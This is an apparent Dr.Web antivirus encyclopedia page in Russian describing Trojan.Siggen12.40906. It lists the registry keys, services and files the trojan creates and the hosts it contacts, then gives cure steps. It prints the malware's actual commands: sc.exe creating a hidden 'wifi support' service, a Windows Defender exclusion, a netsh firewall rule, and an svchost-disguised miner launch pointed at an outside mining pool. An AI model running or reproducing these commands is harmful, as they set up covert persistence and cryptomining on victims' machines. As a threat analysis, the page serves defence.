ПОЛЬЗОВАТЕЛЯМ

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen12.40906

Добавлен в вирусную базу Dr.Web: 2021-03-16

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
  • [<HKLM>\System\CurrentControlSet\Services\ibvzxkvy] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\ibvzxkvy] 'ImagePath' = '%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d"<Полный путь к файлу>"'
  • [<HKLM>\SYSTEM\CurrentControlSet\services\ibvzxkvy] 'ImagePath' = '%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe'
Создает следующие сервисы
  • 'ibvzxkvy' %WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d"<Полный путь к файлу>"
  • 'ibvzxkvy' %WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
  • [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\ibvzxkvy' = '00000000'
Запускает на исполнение
  • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Внедряет код в
следующие системные процессы:
  • %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\xrritctv.exe
  • %WINDIR%\syswow64\config\systemprofile:.repos
Перемещает следующие файлы
  • %TEMP%\xrritctv.exe в %WINDIR%\syswow64\ibvzxkvy\xrritctv.exe
Самоудаляется.
Сетевая активность
Подключается к
  • 'mi##########m.mail.protection.outlook.com':25
  • '19#.#87.29.221':443
  • 'wo##.#-poster.info':25000
  • 'de#####ementrivesud.com':80
  • 'si###n.ea.com':443
  • 'google.com':443
  • 'ac###nts.ea.com':443
  • 'yandex.ru':443
  • '20#.#38.181.240':25
  • 'in###gram.com':443
  • 'google.com':80
  • '18#.#53.217.20':423
  • '14#.#6.108.82':423
  • '45.#0.34.87':423
  • '13#.#.232.208':423
  • '5.#.72.48':423
  • '21#.#72.179.54':423
  • 'ms#.##ol-pay.com':6199
  • '18#.#54.190.218':487
  • '43.#31.4.7':443
  • 'go##le.es':443
  • 'IP###########031-00.auth.np.ac.playstation.net':443
TCP
Запросы HTTP GET
  • http://www.google.com/
  • http://de#####ementrivesud.com/bquqwtns.php
Запросы HTTP POST
  • http://wo##.###oster.info:25000/ via wo##.#-poster.info
  • 'si###n.ea.com':443
  • 'google.com':443
  • 'ac###nts.ea.com':443
  • 'yandex.ru':443
  • '20#.#38.181.240':25
  • 'in###gram.com':443
  • '18#.#54.190.218':487
  • '13#.#.232.208':423
  • '45.#0.34.87':423
  • '18#.#53.217.20':423
  • '21#.#72.179.54':423
  • '14#.#6.108.82':423
  • '5.#.72.48':423
  • 'ms#.##ol-pay.com':6199
  • '19#.#87.29.221':443
  • 'IP###########031-00.auth.np.ac.playstation.net':443
  • UDP
    • DNS ASK mi##########m.mail.protection.outlook.com
    • DNS ASK wo##.#-poster.info
    • DNS ASK de#####ementrivesud.com
    • DNS ASK si###n.ea.com
    • DNS ASK ac###nts.ea.com
    • DNS ASK yandex.ru
    • DNS ASK in###gram.com
    • DNS ASK go##le.es
    • DNS ASK google.com
    • DNS ASK 19#.###.#11.95.cbl.abuseat.org
    • DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
    • DNS ASK 19#.###.#11.95.zen.spamhaus.org
    • DNS ASK 19#.###.#11.95.bl.spamcop.net
    • DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
    • DNS ASK 19#.###.211.95.in-addr.arpa
    • DNS ASK ms#.##ol-pay.com
    • DNS ASK IP###########031-00.auth.np.ac.playstation.net
    Другое
    Создает и запускает на исполнение
    • '%WINDIR%\syswow64\ibvzxkvy\xrritctv.exe' /d"<Полный путь к файлу>"
    • '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ibvzxkvy\' (со скрытым окном)
    • '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\xrritctv.exe" %WINDIR%\SysWOW64\ibvzxkvy\' (со скрытым окном)
    • '%WINDIR%\syswow64\sc.exe' create ibvzxkvy binPath= "%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"' (со скрытым окном)
    • '%WINDIR%\syswow64\sc.exe' description ibvzxkvy "wifi internet conection"' (со скрытым окном)
    • '%WINDIR%\syswow64\sc.exe' start ibvzxkvy' (со скрытым окном)
    • '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (со скрытым окном)
    Запускает на исполнение
    • '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\ibvzxkvy\
    • '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\xrritctv.exe" %WINDIR%\SysWOW64\ibvzxkvy\
    • '%WINDIR%\syswow64\sc.exe' create ibvzxkvy binPath= "%WINDIR%\SysWOW64\ibvzxkvy\xrritctv.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"
    • '%WINDIR%\syswow64\sc.exe' description ibvzxkvy "wifi internet conection"
    • '%WINDIR%\syswow64\sc.exe' start ibvzxkvy
    • '%WINDIR%\syswow64\svchost.exe'
    • '%WINDIR%\syswow64\svchost.exe' -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k

    Рекомендации по лечению

    1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
    2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
    Демо бесплатно

    На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

    Скачать Dr.Web

    По серийному номеру

    Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

    Демо бесплатно

    На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

    Скачать Dr.Web

    По серийному номеру

    На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

    Демо бесплатно

    На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

    Скачать Dr.Web

    По серийному номеру

    1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
    2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
      • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
      • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
      • выключите устройство и включите его в обычном режиме.

    Подробнее о Dr.Web для Android

    Демо бесплатно на 14 дней

    Выдаётся при установке

    Российский разработчик антивирусов Dr.Web с 1992 года
    Dr.Web в Реестре Отечественного ПО
    Dr.Web совместим с российскими ОС и оборудованием
    Dr.Web пользуются в 200+ странах мира
    Техническая поддержка 24х7х365 Рус | En

    Dr.Web © «Доктор Веб»
    2003 — 2021

    «Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

    125124, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А